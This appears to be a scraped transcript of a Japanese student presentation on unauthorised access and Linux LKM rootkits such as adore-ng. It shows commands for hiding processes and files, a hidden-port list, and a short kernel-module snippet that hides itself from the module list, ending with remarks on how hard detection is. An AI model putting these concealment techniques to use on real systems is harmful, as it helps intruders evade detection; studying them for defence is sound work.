1 / 14

最終発表  ー不正アクセスについてー

最終発表  ー不正アクセスについてー.                               環境情報学部3年 櫻井美帆. 不正アクセス. 役立つツールが rootkit. rootkit. ログインの記録を書き換える機能 コマンドファイルの置き換えや改竄 ネットワークスニファ バックドア などのツールがまとめられている. LKM rootkit. コマンドバイナリを改竄する必要がない ーファイルの整合性検査を回避できる カーネル自身を操作する ー正しい情報の取得が困難。発見も困難。. LKM rootkit. ・ adore ・ adore-ng

marja
Download Presentation

最終発表  ー不正アクセスについてー

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. 最終発表 ー不正アクセスについてー                               環境情報学部3年 櫻井美帆

  2. 不正アクセス 役立つツールがrootkit

  3. rootkit • ログインの記録を書き換える機能 • コマンドファイルの置き換えや改竄 • ネットワークスニファ • バックドア などのツールがまとめられている

  4. LKMrootkit • コマンドバイナリを改竄する必要がない ーファイルの整合性検査を回避できる • カーネル自身を操作する ー正しい情報の取得が困難。発見も困難。

  5. LKMrootkit ・adore ・adore-ng ・knark

  6. adore-ng • Stealth氏によって開発されたLKMrootkit • 主にLKM本体のadore-ng.oとクライアントプログラムのavaから構成されている

  7. 主な機能 • process/ファイル/ネットワークなどの隠蔽 • 自分自身の隠蔽 • ローカルバックドア

  8. processの隠蔽 オプションで“i”をつけることにより隠蔽することができる # ps –efww|grep emacs Root 16863 1 0 Des12 ? 00:00:03 emacs –display 172.16.10.10:0.0 # ./ava i 16863 Checking for adore-ng or higher … adore-ng installed. Good luck. made PID 16863 invisible # ps –ef | grep emacs #

  9. ファイルの隠蔽 ファイルも同様にオプションで“h”をつけることにより隠蔽することができる #./ava hxxxx

  10. ネットワーク接続の隠蔽 netstatコマンドの出力結果から、事前に設定しておいたサービス名、またはポート番号が含まれる行を除去することでネットワークサービスの隠蔽を行っている。 u_short HIDDEN_SERVICES[] = {2222, 7350, 0};

  11. 自分自身の隠蔽 #include <linux/kernel.h> #include <linux/module.h> #include <linux/string.h> int init_module(){ if (__this_module.next) __this_module.next = __this_module.next->next; return 0; } int cleanup_module(){ return 0; }

  12. まとめ ・ ハードウェアに近づけば近づくほど  見つけるのが困難となる。 ・ 正常な状態を覚えておいて悪いところを発見するのは困難。 ・ メモリー空間上の書き換えを制限するような仕組みをつくればよいのでは?

More Related